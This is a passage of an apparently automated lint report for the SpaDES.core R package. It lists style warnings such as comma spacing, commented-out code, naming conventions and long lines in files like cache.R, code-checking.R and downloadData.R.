occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    